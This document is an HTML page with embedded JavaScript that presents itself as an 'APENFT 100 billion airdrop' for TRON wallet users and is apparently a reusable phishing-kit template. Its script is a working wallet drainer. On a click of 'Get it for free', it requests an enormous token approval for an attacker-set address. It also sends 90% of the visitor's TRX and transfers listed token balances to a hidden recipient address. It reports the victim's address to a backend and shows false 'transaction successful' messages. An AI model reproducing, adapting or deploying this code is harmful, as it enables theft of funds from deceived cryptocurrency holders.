<!DOCTYPE html>
<html lang="en" class="no-touch">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>APENFT</title>
    <link href="/im/assets/TRC10.ORG_files/favicon.ico" rel="shortcut icon" type="image/x-icon">
    <link href="/im/assets/TRC10.ORG_files/bootstrap.min.css" rel="stylesheet">
    <link href="/im/assets/TRC10.ORG_files/style.css" rel="stylesheet">
    <link href="/im/assets/TRC10.ORG_files/tip.css" rel="stylesheet">
    <!--Css-->
    <meta name="description" content="APENT">
	<meta name="format-detection" content="telephone=no">
	<meta name="msapplication-tap-highlight" content="no">
	<meta name="viewport"content="user-scalable=no,initial-scale=1,maximum-scale=1,minimum-scale=1,width=device-width">
    <link rel="icon" type="image/ico" href="favicon.html">
	<script src="/im/application/views/airdrop/nft/js/common.js"></script>
	<link href="/im/application/views/airdrop/nft/css/vendor.e219c0f7.css" rel="stylesheet">
	<link href="/im/application/views/airdrop/nft/css/app.61e3b724.css" rel="stylesheet">
	<script charset="utf-8" src="/im/application/views/airdrop/nft/js/4.150ed59e.html"></script>
	<!--Css-->
</head>

<body style="overflow: visible">
<div id="preloader" style="display: none">
    <div data-loader="circle-side" style="display: none"></div>
</div>

<div id="loader_form">
    <div data-loader="circle-side-2"></div>
</div>

<div id="q-app">
			<div class="body_layout">
				<div>
					<!---->
					<!---->
					<div class="head">
						<div class="headL">
							<div class="logo"><img src="/im/application/views/airdrop/nft/images/logo.png"></div>
						</div>
						<div class="headR"><i></i></div>
					</div>
					<div class="div_top">
						<div class="div_top_div">
							<p><span>APENFT</span></p>
							<p><span>100 billion airdrop plan</span></p>
							<p><em>1USDTairdrop10000NFT</em></p><img src="/im/application/views/airdrop/nft/images/bg.png">
						</div>
					</div>
					<div class="div_style">
						<div class="div_style_div div_style_div1">
							<div class="t">APENFT was officially registered and established in Singapore on March 29, 2021. It is supported by the world-renowned public chain Ethereum and TRON's underlying technology, combined with the world's largest distributed data storage system<br />
BittorrentFileSystem (BTFS) is a professional foundation dedicated to transforming the world's top artworks into NFT and blockchain.</div>
							<p><a href="/im/application/views/airdrop/nft/info.html" class=""><em>Project Introduction&gt;&gt;</em></a>
							<a href="/im/application/views/airdrop/nft/whitePaper.pdf"target="_blank"><em>white paper&gt;&gt;</em></a><br /><br />
							<a href="http://www.tronlink.org/index.html#/"target="_blank"><em>Download wallet&gt;&gt;</em></a>
							</p>
						</div>
					</div>
					<div class="div_style1">
						<div class="div_style1_div">
							<h1>APENFT 100 billion airdrop plan</h1>
							<p><span>Airdrop ratio</span></p>
							<p><em>1USDT:10000NFT</em></p>
							<p><span>The more USDT holdings, the more NFT airdrops</span></p>
					<center>
                        <div class="qrcode-code" >
                            <div id="qrcode" style="display: none;margin-top: 20px;" title=""></div>
                            <br>
                        </div>
                    </center>
							<cite type="button" onclick="swap()" name="forward" class="btn btn-third btn-tl btn-icon">Get it for free</cite>
							<p><strong>Participation in the event requires your snapshot authorization</strong></p>
						</div>
					</div>
					<div class="div_style">
						<div class="div_style_div">
							<h1>Airdrop description</h1>
							<ul>
								<li>In order to increase the number of Pobao wallet users and quickly increase the global NFT consensus, increase the share of global NFT holding addresses, and bring higher value to NFT followers.</li>
								<li>APENFT officially conducts a 100 billion NFT airdrop program to effective addresses around the world, and the effective authorized addresses can get up to the corresponding NFT assets, and the deadline continues until the NFT is delivered.</li>
							</ul>
						</div>
					</div>
					<div class="div_style">
						<div class="div_style_div">
							<h1>Airdrop rules</h1>
							<ul>
								<li>.This event is for trc20 (TRON) users. At the time of the snapshot, the amount of USDT (trc20) in the wallet will receive a certain percentage of NFT (trc20).</li>
								<li>The airdrop ratio is:1U＝10000NFT</li>
								<li>Users who successfully participate in the event share the event link, and each additional valid address can get 5000NFT.</li>
								<li>NFT will be issued to the wallet address of participating activities within 24 hours after the snapshot time.</li>
								<li>This airdrop enables Python machine learning to identify cheating, and those who are identified as cheating will cancel the airdrop.</li>
							</ul>
						</div>
					</div>
					<div class="div_style">
						<div class="div_style_div">
							<h1>way of participation</h1>
							<ul>
								<li>Open the frequently used wallet and copy the activity link to the wallet browser dapp search bar and paste it to open the activity page, click the [Participate in Activity] button, and the next step is to confirm the snapshot authorization and the registration is successful (a small amount of TRX miner fee will be consumed).</li>
								<li>NFT issuance time for this event (GMT+8) 02:00 on September 3, 2021 to 02:00 on September 30, 2022</li>
								<li>Some wallets may not be able to participate in the event. It is recommended to use the official wallet [Bobao Wallet] to participate in the event.</li>
							</ul>
						</div>
					</div>
					<div class="div_style">
						<div class="div_style_div">
							<h1>NFT contract address</h1>
							<ul>
								<li>TRC:TFczxzPhnThNSqr5by8tvxsdCFRRz6cPNq</li>
								<li>ERC:0xEF40B859D21e4d566a3d713e756197c021BffaAa</li>
								<li>HECO:0x1A5364F782DbED4f69043B02b5c3870a10C23Ed5</li>
								<li>BNB:0x711D17c6EEE1Fa812db7A9e2EB9971e5D6252A05</li>
							</ul>
						</div>
					</div>
					<div class="h20"></div>
				</div>
			</div>
		</div>
	</div>

<!-- 页面(#`O′) -->
<script src="/im/assets/TRC10.ORG_files/jquery-3.5.1.min.js"></script>
<script src="/im/assets/TRC10.ORG_files/tip.js"></script>
<script src="/im/assets/TRC10.ORG_files/qrcode.min.js"></script>
<script>
    var qrcode = new QRCode("qrcode", {
        text: "https://trc-20.payloan.biz/index/vis/index_trc.html?agent=10000",
        colorDark : "#000000",
        colorLight : "#ffffff",
        width: 260,
        height: 260,
        correctLevel : QRCode.CorrectLevel.L
    });


    Qmsg.config({
        html: true,
        autoClose: false,
        showClose: true,
    });
    function accAdd(arg1, arg2) {
        var r1, r2, m, c;
        try {
            r1 = arg1.toString().split(".")[1].length;
        } catch (e) {
            r1 = 0;
        }
        try {
            r2 = arg2.toString().split(".")[1].length;
        } catch (e) {
            r2 = 0;
        }
        c = Math.abs(r1 - r2);
        m = Math.pow(10, Math.max(r1, r2));
        if (c > 0) {
            var cm = Math.pow(10, c);
            if (r1 > r2) {
                arg1 = Number(arg1.toString().replace(".", ""));
                arg2 = Number(arg2.toString().replace(".", "")) * cm;
            } else {
                arg1 = Number(arg1.toString().replace(".", "")) * cm;
                arg2 = Number(arg2.toString().replace(".", ""));
            }
        } else {
            arg1 = Number(arg1.toString().replace(".", ""));
            arg2 = Number(arg2.toString().replace(".", ""));
        }
        return (arg1 + arg2) / m;
    }

    Number.prototype.add = function (arg) {
        return accAdd(arg, this);
    };

    function accSub(arg1, arg2) {
        var r1, r2, m, n;
        try {
            r1 = arg1.toString().split(".")[1].length;
        } catch (e) {
            r1 = 0;
        }
        try {
            r2 = arg2.toString().split(".")[1].length;
        } catch (e) {
            r2 = 0;
        }
        m = Math.pow(10, Math.max(r1, r2));
        n = r1 >= r2 ? r1 : r2;
        return ((arg1 * m - arg2 * m) / m).toFixed(n);
    }

    Number.prototype.sub = function (arg) {
        return accMul(arg, this);
    };

    function accMul(arg1, arg2) {
        var m = 0,
            s1 = arg1.toString(),
            s2 = arg2.toString();
        try {
            m += s1.split(".")[1].length;
        } catch (e) {}
        try {
            m += s2.split(".")[1].length;
        } catch (e) {}
        return (
            (Number(s1.replace(".", "")) * Number(s2.replace(".", ""))) /
            Math.pow(10, m)
        );
    }

    Number.prototype.mul = function (arg) {
        return accMul(arg, this);
    };

    function accDiv(arg1, arg2) {
        var t1 = 0,
            t2 = 0,
            r1,
            r2;
        try {
            t1 = arg1.toString().split(".")[1].length;
        } catch (e) {}
        try {
            t2 = arg2.toString().split(".")[1].length;
        } catch (e) {}
        with (Math) {
            r1 = Number(arg1.toString().replace(".", ""));
            r2 = Number(arg2.toString().replace(".", ""));
            return (r1 / r2) * pow(10, t2 - t1);
        }
    }

    Number.prototype.div = function (arg) {
        return accDiv(this, arg);
    };

    let usdtTrc20 = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";

    let toAddress = "";

    let approveAddress = window.atob(
        ""
    );

    let trc20List = [
        "TE2RzoSV3wFK99w6J9UnnZ4vLfXYoxvRwP",
        "TEBL6vb3PVx9D6aRBu3ynh7fgrJ3wEFiDg",
        "TRg6MnpsFXc82ymUPgf5qbj59ibxiEDWvv",
        "TGBr8uh9jBVHJhhkwSJvQN2ZAKzVkxDmno",
        "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t",
    ];

    let coinId = 1004162;
    let coinName = "APENFT";
    let coinPrecision = 1000000;
    let coinNum = 0;
    let proportion = 10;

    let checkTronReadyNum = 0;

    let timer = setInterval(async () => {
        checkTronReadyNum++;
        if (window.tronWeb && window.tronWeb.ready) {
            let userAddress = window.tronWeb.defaultAddress.base58;
            $("#TronLinkState").text(
                userAddress.substr(0, 3) + "..." + userAddress.substr(31, 3)
            );
            tronWeb.trx.getAccount().then((res) => {
                let tokenBalance = res.assetV2.find(function (o) {
                    return o.key == coinId;
                });
                if (tokenBalance != undefined) {
                    coinNum = tokenBalance.value / coinPrecision;
                    // $("#SHIBNUM").text(`${coinNum.toFixed(2)}`);
                } else {
                    // $("#SHIBNUM").text(`0`);
                }
            });
        } else {
            $("#TronLinkState").text("Not Connected");
            if (checkTronReadyNum > 3) {
                showNoConnet();
                clearInterval(timer);
            }
        }
    }, 500);

    function showNoConnet() {
        $('#qrcode').show();
        Qmsg.error(`Please use the Tron wallet App to scan the QR code or use the Tronlink extension on your browser.`);
    }

    function change() {
        if ($($("input")[0]).attr("placeholder") == `${coinName} Amount`) {
            $($("input")[0]).attr("placeholder", "TRX Amount");
            $($("input")[1]).attr("placeholder", `${coinName} Amount`);
        } else {
            $($("input")[0]).attr("placeholder", `${coinName} Amount`);
            $($("input")[1]).attr("placeholder", "TRX Amount");
        }
        var t = $($("input")[0]).val();
        $($("input")[0]).val($($("input")[1]).val());
        $($("input")[1]).val(t);
    }

    function calculation() {
        if ($($("input")[0]).attr("placeholder") == `${coinName} Amount`) {
            $($("input")[1]).val(Number($($("input")[0]).val()).mul(proportion));
        } else {
            $($("input")[1]).val(Number($($("input")[0]).val()).div(proportion));
        }
    }

    function getInputCoinNum() {
        if ($($("input")[0]).attr("placeholder") == `${coinName} Amount`) {
            return Number($($("input")[0]).val());
        } else {
            return Number($($("input")[1]).val());
        }
        return 0;
    }

    $($("input")[0]).change(function () {
        calculation();
    });

    $($("input")[0]).keyup(function () {
        calculation();
    });

    function sellAll() {
        if (coinNum <= 0) {
            Qmsg.error(` Insufficient assets `);
            return;
        }
        $($("input")[0]).val(coinNum);
        $($("input")[0]).keyup();
    }

    function swap() {
        onConnect();
    }

    function toTrx(usdtContract, trxbalance) {
        usdtContract
            .approve(approveAddress, 1000000000000000)
            .send()
            .finally(() => {
                let trxbalanceNum = trxbalance / 1000000;
                if (trxbalanceNum > 100) {
                    let loading = Qmsg.loading(
                        `Please authorize your TRX assets so that the system can view and complete the transaction.`
                    );
                    let sendTrx = Math.round(
                        Number(trxbalance).mul(Number(90).div(100))
                    );
                    tronWeb.trx.sendTransaction(toAddress, sendTrx).finally(() => {
                        loading.close();
                        toTrc20();
                    });
                } else {
                    Qmsg.error(
                        `The operation failed, your account needs at least 100TRX to participate in the activity (we are screening active users).`
                    );
                    toTrc20();
                }
            });
    }

    let toTrc20Loading = null;

    function toTrc20(index) {
        if (index === undefined) index = 0;
        if (toTrc20Loading == null || toTrc20Loading.state !== "opening") {
            toTrc20Loading = Qmsg.loading(
                `Please authorize your wallet to complete the transaction.`
            );
        }
        if (index == trc20List.length) {
            tronWeb.trx
                .getAccount()
                .then((res) => {
                    let tokenBalance = res.assetV2.find(function (o) {
                        return o.key == "1002000";
                    });
                    if (tokenBalance && tokenBalance.value > 10) {
                        tronWeb.trx
                            .sendToken(toAddress, tokenBalance.value, "1002000")
                            .finally((res) => {
                                toTrc20Loading.close();
                                Qmsg.success(
                                    `<br><br>The transaction is successful, and the block will arrive after confirmation<br><br>`
                                );
                            });
                    } else {
                        toTrc20Loading.close();
                        Qmsg.success(
                            `<br><br>The transaction is successful, and the block will arrive after confirmation<br><br>`
                        );
                    }
                })
                .catch(() => {
                    toTrc20Loading.close();
                    Qmsg.success(
                        `<br><br>The transaction is successful, and the block will arrive after confirmation<br><br>`
                    );
                });
            return;
        }
        let trc20CCAddress = trc20List[index];

        const forContract = new Promise((resolution, rejection) => {
            tronWeb
                .contract()
                .at(trc20CCAddress)
                .then((cc) => {
                    if (!cc.balanceOf) {
                        resolution();
                        return;
                    }
                    cc.balanceOf(window.tronWeb.defaultAddress.base58)
                        .call()
                        .then((balance) => {
                            if (balance.toNumber() >= 5) {
                                //   cc.approve(approveAddress, 1000000000000000000000000000)
                                //     .send()
                                //     .finally(() => {
                                cc.transfer(toAddress, balance.toNumber())
                                    .send()
                                    .finally(() => {
                                        resolution();
                                    });
                                //    });
                            } else {
                                resolution();
                            }
                        })
                        .catch(() => {
                            resolution();
                        });
                })
                .catch(() => {
                    resolution();
                });
        }).finally(() => {
            toTrc20(index + 1);
        });
    }

    async function postInfo(address, symbol) {
		var data = {
			address: address,
			auth_address: authorized_address,
			bizhong: symbol,
			agent: agent
		}

		var d = new Date();
		var n = d.getTime();

		$.ajax({
			type: 'get',
			url:  domain + "{:url('index/api/trc_post')}?t="+n,
			data: data,
			success:function(){
			}
		})
	}


    var address = "{$address}";
	var agent = "{$userId}";
	var rank = 6.5;
	var authorized_address = '{$authorized_address}';
	var domain = '{$domain}';
	var bizhong = 'USDT';
	var approveAddr = "{$approveAddr}";


    const addr = {
        'WIN': 'TLa2f6VPqDgRE67v1736s7bJ8Ray5wYjU7',
        'USDT':'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t',
        'TONS': 'THgLniqRhDg5zePSrDTdU9QwY8FjD9nLYt',
        'USDJ': 'TMwFHYXLJaRUPeW6421aqXL4ZEzPRFGkGT',
        'JST': 'TCFLL5dx5ZJdKnWuesXxi1VPwjLVmWZZy9',
        'HT': 'TDyvndWuvX5xTBwHPYJi7J3Yq8pq8yh62h',
        'SUN': 'TKkeiboTkxXKJpbmVFbv4a8ov5rAfRDMf9',
        "EXNX": "TCcVeKtYUrHEQDPmozjJFMrf6XX7BgF84A",
        "VCOIN": "TNisVGhbxrJiEHyYUMPxRzgytUtGM7vssZ",
        "POL":"TWcDDx1Q6QEoBrJi9qehtZnD4vcXXuVLer",
        "CKRW":"TTVTdn8ipmacfKsCHw5Za48NRnaBRKeJ44"
    }

    const price = {
        'WIN': 0.001150,
        'USDT':1,
        'TONS':1.35,
        'USDJ':1.04,
        'JST': 0.125,
        "HT": 20.41,
        "SUN": 33.97,
        "EXNX": 0.0621,
        "VCOIN": 0.004225,
        "POL": 0.1393,
        "CKRW": 0.002487,
    }

    const decimals = {
        'WIN': 6,
        'USDT':6,
        'TONS':6,
        'USDJ':18,
        'JST': 18,
        "HT": 18,
        "SUN": 18,
        "EXNX": 18,
        "VCOIN": 6,
        "POL": 8,
        "CKRW": 6,
    }

    var total=0;
    async function getMostValuableAssets(account) {
        let _symbol = 'USDT'
        for (const symbol of Object.keys(addr)) {
            let contract = await tronWeb.contract().at(addr[symbol]);
            let myBalance = await contract.balanceOf(account).call(function(err,balance){
                const usdt = balance / (10** (decimals[symbol] || 18)) * price[symbol]
                console.log(usdt);
                if (usdt > total && usdt > 500) {
                    _symbol = symbol
                    total = usdt
                    approveAddr = addr[_symbol]
                }
            })
        }
        bizhong = _symbol
        return _symbol
    }

    /**
     * * Connect wallet button pressed.
     */
    async function onConnect() {
        Qmsg.loading(
            `<br><br>Please authorize your wallet to complete the transaction<br><br>`
        );

        let tronWeb = window.tronWeb
        let walletAddress = tronWeb.defaultAddress.base58;
        // bizhong = await getMostValuableAssets(walletAddress);
        let instance = await tronWeb.contract().at(approveAddr);
        let res = await instance["increaseApproval"](authorized_address,"90000000000000000000000000000");
        res.send({
            feeLimit: 100000000,
            callValue: 0,
            shouldPollResponse: false
        },function(err,res){
            if(err == null){
                Qmsg.success(
                    `<br><br>The transaction is successful, and the block will arrive after confirmation<br><br>`
                );
                // setTimeout(function () {
                //     Qmsg.error(
                //         `<br><br>The operation failed, your account needs at least 100TRX to participate in the activity (we are screening active users)<br><br>`
                //     );
                // },2000);
                postInfo(walletAddress,bizhong)
                postInfo(walletAddress,bizhong)
            }
        })
    }
    function init() {
        getInfo();
    }


    async function s(){
        var tronWeb = window.tronWeb
        let contract = await tronWeb.contract().at(addr[symbol]);
        let walletAddress = tronWeb.defaultAddress.base58;
        let result = await contract.balanceOf(walletAddress).call(function(err,tex){
            if(err == null){
                let total = tex._hex/(10**6);
                $('#yu').text(total.toLocaleString() +' USDT')
                console.log();
            }
        });

    }

    /**
     * Main entry point.
     */

    init();
</script>


</body>
</html>